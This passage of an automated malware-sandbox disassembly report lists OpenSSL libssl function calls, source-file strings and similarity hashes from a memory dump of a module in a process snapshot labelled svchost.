                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496469
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB496481
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB49656F
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB49657B
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4965AB
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4965D8
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,00000000,?,?,?,?,?,00007FFBAB48E953), ref: 00007FFBAB4965E0
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$O_freeO_memcmpY_exY_freeY_missing_parametersd2i_
                                                                                              • String ID: ssl\statem\statem_lib.c$tls_process_rpk
                                                                                              • API String ID: 2574011182-3798400865
                                                                                              • Opcode ID: 6f241ae834e0f5e969e3fdeae8b107c3cc6316ff65a60cb2fa840de97d3a40a9
                                                                                              • Instruction ID: 4ee473d32bca475201dc6214ed7a817d445f9c1a8131f61c899d893c570f6a67
                                                                                              • Opcode Fuzzy Hash: 6f241ae834e0f5e969e3fdeae8b107c3cc6316ff65a60cb2fa840de97d3a40a9
                                                                                              • Instruction Fuzzy Hash: 04C190A2A0E68281FB62DB76E5803BD6391EB44794F10C135EE7D826E5DF3CE495C701
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_errorX_free
                                                                                              • String ID: $ $ssl\statem\statem_srvr.c$tls_process_cke_gost18
                                                                                              • API String ID: 69550846-3863225748
                                                                                              • Opcode ID: 00d8c6dc8efc5c8ef4ecaa0cfa2a26c64706626428e821f2e2f0224a3dd28f48
                                                                                              • Instruction ID: de0aa74ab27c9a6e4a2e08871e55be1a2730b72be1e9b51ddb08b840778af08c
                                                                                              • Opcode Fuzzy Hash: 00d8c6dc8efc5c8ef4ecaa0cfa2a26c64706626428e821f2e2f0224a3dd28f48
                                                                                              • Instruction Fuzzy Hash: BB815FB1A1E64281F662EB72E8917FD2351BF84B80F408432EE2D476B7DE7CE5488750
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41ABF6
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AC0E
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AC20
                                                                                              • ASN1_item_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AC2F
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AC82
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AC9A
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41ACC3
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41ACDB
                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AD45
                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AD7F
                                                                                              • X509_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41ADDB
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41ADF6
                                                                                              • d2i_PUBKEY_ex.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AE31
                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AE6D
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AEFB
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AF41
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AF59
                                                                                                • Part of subcall function 00007FFBAB41B500: CRYPTO_free.LIBCRYPTO-3-X64(00000000,00007FFBAB41AE9A,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41B52E
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41AFC4
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41B02D
                                                                                              • ASN1_item_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB41B07F
                                                                                              Similarity
                                                                                              • API ID: O_freeR_newR_set_debug$memcpy$N1_item_free$R_set_errorX509_freeY_exY_freed2i_
                                                                                              • String ID: d2i_SSL_SESSION_ex$ssl\ssl_asn1.c
                                                                                              • API String ID: 3345805239-3787699099
                                                                                              • Opcode ID: 08c168e653102878f2f672e4712d67bdc309429c95d44fbb4e96ba3687ef8e26
                                                                                              • Instruction ID: 5d24aefca9dfa04bc790ca2b2c876bb5212cd1822cf251e02ffa541eff8dcef5
                                                                                              • Opcode Fuzzy Hash: 08c168e653102878f2f672e4712d67bdc309429c95d44fbb4e96ba3687ef8e26
                                                                                              • Instruction Fuzzy Hash: 54E12DB2A0AB8692EB669F35E4812B937A4FB44B44F088036DE6D477B5DF38E454C310
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printf$O_puts$O_freeO_zalloc
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Ack delay (raw) %llu$ Ack range count: %llu$ Ack range len: %llu$ First ack range: %llu$ Gap: %llu$ Largest acked: %llu$ (with ECN)$ (without ECN)$Ack $ssl\quic\quic_trace.c
                                                                                              • API String ID: 1392080105-452490795
                                                                                              • Opcode ID: aaea0fa10fea37a6471be535342dd04dbe935009f4cd36361e677d794d860f6a
                                                                                              • Instruction ID: da3ddb7f3bd162c60c33f71e5c4fe73d423215620d2fe7fe71816c8f1813262d
                                                                                              • Opcode Fuzzy Hash: aaea0fa10fea37a6471be535342dd04dbe935009f4cd36361e677d794d860f6a
                                                                                              • Instruction Fuzzy Hash: 1B416AA2B0A75294FE22DBB5D8602FC2761FB44B94F44903ACE2D176A5DE3CE44AC340
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/packet.h$ssl\ssl_lib.c$ssl_cache_cipherlist
                                                                                              • API String ID: 4275876640-878095499
                                                                                              • Opcode ID: 9d6e9ff241596d830fe551f836550e6429d03e1f2991cc0af5c0d4a8b6431be4
                                                                                              • Instruction ID: 9aadbb78b6f141a33fae9b5e0cf28e863564a2849f6345c589399098dfc11793
                                                                                              • Opcode Fuzzy Hash: 9d6e9ff241596d830fe551f836550e6429d03e1f2991cc0af5c0d4a8b6431be4
                                                                                              • Instruction Fuzzy Hash: C771C0B1A0AB8281EB62DF72D4916F93365EF54784F448035DE6D47ABAEF3CE2458301
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$D_unlock$D_read_lock$memset
                                                                                              • String ID: ssl\ssl_sess.c$ssl_generate_session_id
                                                                                              • API String ID: 3158670085-908510661
                                                                                              • Opcode ID: 4a2608fc511d51f38a49b1eb859a161b0b8407680a5219e0000badd70b6623ca
                                                                                              • Instruction ID: a5e09ce424f8afa97c738c4a2ac8f76883d3b85523db2e6b3259deaed44652be
                                                                                              • Opcode Fuzzy Hash: 4a2608fc511d51f38a49b1eb859a161b0b8407680a5219e0000badd70b6623ca
                                                                                              • Instruction Fuzzy Hash: 4E61D3B2B1A54281F766DB36E8916FD2360EF84784F588031DE2D47AF5DF2CE5858700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$EnvironmentVariable$freemalloc$O_freeO_mallocgetenv
                                                                                              • String ID: OPENSSL_WIN32_UTF8$crypto\getenv.c
                                                                                              • API String ID: 961399396-38007710
                                                                                              • Opcode ID: 7bafd972a445d01b9677d38324dda73a783f8ed59ccde74f62ef29f0471c9999
                                                                                              • Instruction ID: 3baeb777bd3928257f30dd1501f4fb3dd9ebd3dec0a068d4f6ec9f5b31d7faea
                                                                                              • Opcode Fuzzy Hash: 7bafd972a445d01b9677d38324dda73a783f8ed59ccde74f62ef29f0471c9999
                                                                                              • Instruction Fuzzy Hash: DC81C2A2F0AA4286FB269B36E85117966D5BF44BE0F448636DE3D57BE4EF3CD4049300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$O_free$O_memcmpO_strndupmemchr
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/packet.h$ssl\statem\extensions_srvr.c$tls_parse_ctos_server_name
                                                                                              • API String ID: 780431574-3519811762
                                                                                              • Opcode ID: 859949db2d3d7faf1b77a08b5c303842377056ef0c836e65578dac2b5671074e
                                                                                              • Instruction ID: 07b6f65bd3b18c879ddc12323469e748630105a12ab2f9722a2a5a12657d4b07
                                                                                              • Opcode Fuzzy Hash: 859949db2d3d7faf1b77a08b5c303842377056ef0c836e65578dac2b5671074e
                                                                                              • Instruction Fuzzy Hash: F971BDA2E0E69281FBA29BB5D4513BD63A1EF44788F44C436DE6C476B6DE3CE584C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: N_clear_free$R_newR_set_debug$O_clear_freeO_malloc
                                                                                              • String ID: srp_generate_client_master_secret$ssl\tls_srp.c
                                                                                              • API String ID: 2561172722-329117511
                                                                                              • Opcode ID: fa1b1ddf2f1494409767827b86814f9e7f048f390c60cbe00c7152a546646e22
                                                                                              • Instruction ID: 90d34487345f06580255b8b736868db74dd66e3c60565c2dad992f4f7cb50cd9
                                                                                              • Opcode Fuzzy Hash: fa1b1ddf2f1494409767827b86814f9e7f048f390c60cbe00c7152a546646e22
                                                                                              • Instruction Fuzzy Hash: 6561B4B5B0A74281E62AEB72D4A16BE6350FF45BC4F848435DE2E477A2DF3CE1558300
                                                                                              APIs
                                                                                              • RAND_priv_bytes_ex.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB46307B
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463097
                                                                                              • EVP_CIPHER_fetch.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4630B5
                                                                                              • EVP_CIPHER_CTX_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4630C6
                                                                                              • EVP_CIPHER_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4630FE
                                                                                              • OPENSSL_LH_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463113
                                                                                              • OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB46313C
                                                                                              • OPENSSL_LH_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463158
                                                                                              • OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB46317A
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB463191
                                                                                              • OPENSSL_LH_doall.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4631A6
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4631AF
                                                                                              • EVP_CIPHER_CTX_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4631B7
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4631CC
                                                                                              • EVP_CIPHER_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB45AD0F,?,00007FFBAB4523E0), ref: 00007FFBAB4631D4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_freeH_newH_set_thunksR_free$D_priv_bytes_exH_doallO_freeO_zallocR_fetchX_freeX_new
                                                                                              • String ID: AES-128-ECB$ssl\quic\quic_srtm.c
                                                                                              • API String ID: 2270308179-3908675888
                                                                                              • Opcode ID: 9d569477bdebd29a7f8aacb2b6e42e9cf91cb9ed3bcd4f9bb676f4dfa6c3972a
                                                                                              • Instruction ID: b0b26e6f92032bc462ad799f1343bf067a2a5d2131fcfa1262ef052d448a4d0c
                                                                                              • Opcode Fuzzy Hash: 9d569477bdebd29a7f8aacb2b6e42e9cf91cb9ed3bcd4f9bb676f4dfa6c3972a
                                                                                              • Instruction Fuzzy Hash: EA4121A1A1B69295FA62DB35E8612B82360BF44B84F44C036DD6D477B6EF3CE509C340
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_zalloc
                                                                                              • String ID: gfffffff$gfffffff$gfffffff$gfffffff$ssl\statem\extensions.c$tls_collect_extensions
                                                                                              • API String ID: 2822291608-844333917
                                                                                              • Opcode ID: c4cc637ee1ed934fec5b0306e0264cc1675cea91cb76cb95a093ed73c75c80bf
                                                                                              • Instruction ID: 6cf87e6560d9ab3585e611e6297c6f3133db6dbf5a97300f4b8f81eec6656162
                                                                                              • Opcode Fuzzy Hash: c4cc637ee1ed934fec5b0306e0264cc1675cea91cb76cb95a093ed73c75c80bf
                                                                                              • Instruction Fuzzy Hash: 0BC1D6B2A0E79281EB628B3AE4407B96791FF85B84F54C131DE6D436A6CF3DE485C701
                                                                                              APIs
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB43105E
                                                                                              • memcpy.VCRUNTIME140(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB43107F
                                                                                                • Part of subcall function 00007FFBAB431000: CRYPTO_free.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4310AA
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4310C7
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4310DF
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4310F0
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB431120
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB431138
                                                                                              • CRYPTO_realloc.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB431158
                                                                                              • memcpy.VCRUNTIME140(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB431187
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4311AE
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4311CE
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4311E6
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000004,00007FFBAB4314E5,?,?,?,?,?,?,?,00007FFBAB421B0F), ref: 00007FFBAB4311F7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$R_set_errormemcpy$O_freeO_mallocO_realloc
                                                                                              • String ID: SSL_CTX_use_serverinfo_ex$ssl\ssl_rsa.c
                                                                                              • API String ID: 2781819888-2805076526
                                                                                              • Opcode ID: dbbcc59e0fb2653ce460d433fd213e1ad87961e3dce96ed97a3f724f90b88252
                                                                                              • Instruction ID: 73978bbead44ac2775816b5ed1d43b632af1315fed6bcdc428f2f2cf5e26a974
                                                                                              • Opcode Fuzzy Hash: dbbcc59e0fb2653ce460d433fd213e1ad87961e3dce96ed97a3f724f90b88252
                                                                                              • Instruction Fuzzy Hash: 715196B1B0AA8281EA52DB72D8521FD6364EF84BC0F58C435ED2D477F6DE2CE5459300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: strncmp$R_new$R_set_debugR_set_error
                                                                                              • String ID: SECLEVEL=$STRENGTH$ssl\ssl_ciph.c$ssl_cipher_process_rulestr
                                                                                              • API String ID: 2651782980-2883399597
                                                                                              • Opcode ID: bb585ae05d445b0eaa17ed907fdf327e7f08effd77892dc8b179ba44535fb324
                                                                                              • Instruction ID: 458399887dc0493eb2769b2214c27a07b7dc79fb0f136751e5b173687b8d84a1
                                                                                              • Opcode Fuzzy Hash: bb585ae05d445b0eaa17ed907fdf327e7f08effd77892dc8b179ba44535fb324
                                                                                              • Instruction Fuzzy Hash: D1E185B2E0E24686E766CA35F45133A7791FB45B44F148036DE6D437A5DF3CE8469B00
                                                                                              APIs
                                                                                              • EVP_PKEY_new.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43A8D5
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43A91B
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43A94B
                                                                                              • ERR_set_mark.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43A97C
                                                                                              • EVP_PKEY_set_type.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43A9EA
                                                                                              • EVP_PKEY_CTX_new_from_pkey.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AA04
                                                                                              • EVP_PKEY_CTX_free.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AA13
                                                                                              • OBJ_txt2nid.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AA9A
                                                                                              • OBJ_txt2nid.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AAB4
                                                                                              • OBJ_txt2nid.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AAC7
                                                                                              • ERR_pop_to_mark.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AAFD
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AB69
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AB7E
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,?,00000000,?,00007FFBAB4245A8), ref: 00007FFBAB43AB86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
